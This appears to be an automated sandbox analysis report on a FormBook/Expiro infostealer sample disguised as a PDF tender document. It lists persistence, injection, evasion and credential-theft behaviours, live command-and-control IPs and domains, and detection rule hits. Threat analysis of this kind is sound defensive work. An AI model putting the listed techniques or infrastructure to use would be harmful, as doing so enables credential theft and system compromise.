Edit tour

Windows Analysis Report
Supply Tender documents PDF.exe

Overview

General Information

Sample name:	Supply Tender documents PDF.exe
Analysis ID:	1637257
MD5:	69746bdc4650cd412bcc2169e749f099
SHA1:	fe3cc1db48e050a70858264ce2abd26fb82cc716
SHA256:	301dc94eb5d63a0fcd4a53c6b378d5d20ae42d0e56e0a5ab584f0baa59b5c8d6
Tags:	exeuser-julianmckein
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Creates files inside the volume driver (system volume information)

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking computer name)

Found evasive API chain (may stop execution after checking volume information)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queries random domain names (often used to prevent blacklisting and sinkholes)

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Supply Tender documents PDF.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Supply Tender documents PDF.exe" MD5: 69746BDC4650CD412BCC2169E749F099)

mouslingly.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\Supply Tender documents PDF.exe" MD5: 69746BDC4650CD412BCC2169E749F099)

svchost.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\Supply Tender documents PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

NSSASn0WvLKV.exe (PID: 4320 cmdline: "C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\0qadN4OhHLBA.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

mfpmp.exe (PID: 3472 cmdline: "C:\Windows\SysWOW64\mfpmp.exe" MD5: 9CD65F38A2B4E53E8180395DE4988D6A)

NSSASn0WvLKV.exe (PID: 6176 cmdline: "C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\TQ72HoJI8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

armsvc.exe (PID: 7552 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: BFA3B59AD3336407BF75ABCE5A56337C)

alg.exe (PID: 7596 cmdline: C:\Windows\System32\alg.exe MD5: F5E6E1DFD8CA29BDAAB9C8067124E6E9)

FXSSVC.exe (PID: 7804 cmdline: C:\Windows\system32\fxssvc.exe MD5: 48ADB41F97B5DEFA4C2D6F33F7F862C8)

elevation_service.exe (PID: 8056 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: B10D869350A14DFA984751AB74C38406)

maintenanceservice.exe (PID: 8096 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 03E165C8E5968D29875C95EB262875BF)

msdtc.exe (PID: 8136 cmdline: C:\Windows\System32\msdtc.exe MD5: C35BF2F131AED424C7BD32D6E39B5B6D)

PerceptionSimulationService.exe (PID: 7220 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 46B7F76EB38C3B3A5B0CAAC94FAC57F5)

perfhost.exe (PID: 7360 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: D79E3A898C9806CAB7293F57034B484D)

Locator.exe (PID: 2028 cmdline: C:\Windows\system32\locator.exe MD5: 2D3A8AF49AB8CE78DCFA3FB93C59A17D)

wscript.exe (PID: 7588 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

mouslingly.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe" MD5: 69746BDC4650CD412BCC2169E749F099)

svchost.exe (PID: 1236 cmdline: "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

SensorDataService.exe (PID: 8108 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 6B11D13DC10B702A320A901F624FB4CC)

snmptrap.exe (PID: 1992 cmdline: C:\Windows\System32\snmptrap.exe MD5: E151EF739C9F9462E350ED17643EA8BF)

Spectrum.exe (PID: 7864 cmdline: C:\Windows\system32\spectrum.exe MD5: 9EBB2DC7106EDA2F4CB311EB191920DE)

ssh-agent.exe (PID: 1304 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: A48D08BED1A77D3D5205E699953D76A1)

TieringEngineService.exe (PID: 5652 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: BC94C1ACAE65D55941BA41EADFC9372C)

AgentService.exe (PID: 7936 cmdline: C:\Windows\system32\AgentService.exe MD5: 3986E7FF603BAB5195C7144D71F9ED6F)

vds.exe (PID: 5500 cmdline: C:\Windows\System32\vds.exe MD5: 8C36A48C4495C328ED49F19714F2B0DF)

wbengine.exe (PID: 4100 cmdline: "C:\Windows\system32\wbengine.exe" MD5: A37C171C930FDE4784CF1BEB15212960)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000026.00000002.2452406678.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000018.00000002.2402839580.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000018.00000002.2439825242.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000018.00000002.2437015933.0000000002A70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000019.00000002.1400922862.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1386107943.0000000006200000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1373314710.00000000031A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1367546163.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.2438305108.0000000005020000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
25.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
25.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , ProcessId: 7588, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", CommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", CommandLine|base64offset|contains: Mz, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", ParentImage: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe, ParentProcessId: 7628, ParentProcessName: mouslingly.exe, ProcessCommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", ProcessId: 7756, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs" , ProcessId: 7588, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", CommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", CommandLine|base64offset|contains: Mz, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", ParentImage: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe, ParentProcessId: 7628, ParentProcessName: mouslingly.exe, ProcessCommandLine: "C:\Users\user\Desktop\Supply Tender documents PDF.exe", ProcessId: 7756, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe, ProcessId: 7628, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs

Suricata Signatures

ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:06:14.362684+0100	2051651	1	A Network Trojan was detected	192.168.2.4	63151	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:15.877687+0100	2051649	1	A Network Trojan was detected	192.168.2.4	61358	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:14.350975+0100	2051648	1	A Network Trojan was detected	192.168.2.4	59696	1.1.1.1	53	UDP

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:46.117980+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49741	13.248.169.48	80	TCP
2025-03-13T13:05:14.351535+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49773	13.248.169.48	80	TCP
2025-03-13T13:05:28.092175+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49790	199.59.243.160	80	TCP
2025-03-13T13:05:46.322151+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49800	13.248.169.48	80	TCP
2025-03-13T13:05:59.646777+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49804	13.248.169.48	80	TCP
2025-03-13T13:06:12.815470+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49812	13.248.169.48	80	TCP
2025-03-13T13:06:32.837505+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49819	37.27.60.109	80	TCP
2025-03-13T13:06:46.058740+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49823	13.248.169.48	80	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:12.602333+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49721	TCP
2025-03-13T13:04:25.443496+0100	2018141	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.4	49736	TCP
2025-03-13T13:04:48.377877+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49742	TCP
2025-03-13T13:04:55.603755+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49749	TCP
2025-03-13T13:04:56.338090+0100	2018141	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49750	TCP
2025-03-13T13:05:01.263492+0100	2018141	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.4	49755	TCP
2025-03-13T13:05:01.982583+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49756	TCP
2025-03-13T13:05:09.896472+0100	2018141	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.4	49767	TCP
2025-03-13T13:05:20.836153+0100	2018141	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.4	49779	TCP
2025-03-13T13:05:23.539101+0100	2018141	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.4	49783	TCP
2025-03-13T13:05:30.429532+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49793	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:12.602333+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49721	TCP
2025-03-13T13:04:25.443496+0100	2037771	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.4	49736	TCP
2025-03-13T13:04:48.377877+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49742	TCP
2025-03-13T13:04:55.603755+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49749	TCP
2025-03-13T13:04:56.338090+0100	2037771	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49750	TCP
2025-03-13T13:05:01.263492+0100	2037771	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.4	49755	TCP
2025-03-13T13:05:01.982583+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49756	TCP
2025-03-13T13:05:09.896472+0100	2037771	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.4	49767	TCP
2025-03-13T13:05:20.836153+0100	2037771	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.4	49779	TCP
2025-03-13T13:05:23.539101+0100	2037771	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.4	49783	TCP
2025-03-13T13:05:30.429532+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49793	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:46.117980+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49741	13.248.169.48	80	TCP
2025-03-13T13:05:14.351535+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49773	13.248.169.48	80	TCP
2025-03-13T13:05:28.092175+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49790	199.59.243.160	80	TCP
2025-03-13T13:05:46.322151+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49800	13.248.169.48	80	TCP
2025-03-13T13:05:59.646777+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49804	13.248.169.48	80	TCP
2025-03-13T13:06:12.815470+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49812	13.248.169.48	80	TCP
2025-03-13T13:06:32.837505+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49819	37.27.60.109	80	TCP
2025-03-13T13:06:46.058740+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49823	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:05:06.677913+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49762	13.248.169.48	80	TCP
2025-03-13T13:05:09.216236+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49765	13.248.169.48	80	TCP
2025-03-13T13:05:12.820948+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49769	13.248.169.48	80	TCP
2025-03-13T13:05:20.004722+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49778	199.59.243.160	80	TCP
2025-03-13T13:05:22.660912+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49782	199.59.243.160	80	TCP
2025-03-13T13:05:25.457790+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49786	199.59.243.160	80	TCP
2025-03-13T13:05:38.654898+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49797	13.248.169.48	80	TCP
2025-03-13T13:05:41.190258+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49798	13.248.169.48	80	TCP
2025-03-13T13:05:43.739608+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49799	13.248.169.48	80	TCP
2025-03-13T13:05:51.835945+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49801	13.248.169.48	80	TCP
2025-03-13T13:05:54.382426+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49802	13.248.169.48	80	TCP
2025-03-13T13:05:57.078788+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49803	13.248.169.48	80	TCP
2025-03-13T13:06:06.231340+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49806	13.248.169.48	80	TCP
2025-03-13T13:06:08.773889+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49807	13.248.169.48	80	TCP
2025-03-13T13:06:11.331736+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49808	13.248.169.48	80	TCP
2025-03-13T13:06:25.124190+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49816	37.27.60.109	80	TCP
2025-03-13T13:06:27.733296+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49817	37.27.60.109	80	TCP
2025-03-13T13:06:30.290793+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49818	37.27.60.109	80	TCP
2025-03-13T13:06:38.382988+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49820	13.248.169.48	80	TCP
2025-03-13T13:06:40.920793+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49821	13.248.169.48	80	TCP
2025-03-13T13:06:43.497139+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49822	13.248.169.48	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:04:11.180573+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49719	52.11.240.239	80	TCP
2025-03-13T13:06:10.917345+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49809	34.227.7.138	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Supply Tender documents PDF.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen

Multi AV Scanner detection for submitted file

Source: Supply Tender documents PDF.exe	Virustotal: Detection: 79%			Perma Link
Source: Supply Tender documents PDF.exe	ReversingLabs: Detection: 84%

Yara detected FormBook

Source: Yara match	File source: 25.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2452406678.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2402839580.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2439825242.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2437015933.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1400922862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1386107943.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1373314710.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1367546163.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2438305108.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Supply Tender documents PDF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.1769006173.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Supply Tender documents PDF.exe, 00000000.00000003.1149511448.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1231003813.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
